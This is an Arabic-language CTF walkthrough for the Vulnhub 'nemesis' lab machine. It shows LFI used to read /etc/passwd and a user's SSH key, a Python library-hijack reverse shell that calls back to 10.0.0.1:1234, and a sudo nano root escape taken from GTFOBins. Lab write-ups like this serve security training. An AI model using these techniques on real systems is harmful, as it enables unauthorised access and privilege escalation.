Posts Vulnhub nemesis
Post
Cancel

Vulnhub nemesis

vulnhub nemesis

CTF السلام عليكم اليوم سنحل تحدي

VULNHUB من تحديات
يمكنك تحميله من هنا

nemesis

Walkthrough

scanning

nmap نبدا بفحص السيرفر ب

Desktop View

1
 نلاحظ وجود 4 بورت

80 : الخاص بالويب سيرفر

52845: شغال ويب سيرفر

52846: ssh خاص ب

Enumeration

نتصفح الموقع

Desktop View

عند القاء نظرة على سورس كود نجد كلمة سر واسم مستخدم

Desktop View

rabbit hole عبارة عن

port 52845 نتصفح

web application عند فحص

lfi نجد انه مصاب بثغرة

Desktop View

لنرى اليوزرس المتواجدين هنا passwd نقوم بسحب ملف

Desktop View

thanos نجد يوزر

ssh key نبحث داخله هل هناك

../../../../home/thanos

Desktop View

وجدنا الملف الان نقوم بحفظه و تغير الصلاحيات

Desktop View

نتصل ب السيرفر الان

Desktop View

كل مدة زمنية backup يقوم بعمل python نجد ملف

Desktop View

zipfile باسم python نقوم بانشاء ملف

nc و نشغل

python يعمل ملف carloss عندما يتم تشغيل الملف بواسطة

لشال الخاص بنا import

1
2
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Desktop View

ننتظر قليل حتى نحصل على الاتصال من السيرفر

Desktop View

home directory نجد داخل
ملف يقوم بالتشفير بداخله كلمة سر

Desktop View

affine نلاحظ انه عمل تشفير ب

Desktop View

نقوم بفك تشفيره

Desktop View

نحصل على كلمة سر

Privilege Escalation

ان يشغل بصلاحيات رووت carlos ثم نرى ماذا يستطيع

باستخدام الامر التالي

1
 sudo -l 

Desktop View

Desktop View

gtfobiins نتوجه الى nano نجد ان يستطيع استخدام

Desktop View

نكتب

1
2
3
sudo nano
^R^X
reset; sh 1>&0 2>&0

Desktop View

ROOT نحصل على

Desktop View

This post is licensed under CC BY 4.0 by the author.

Trending Tags

Contents

Trending Tags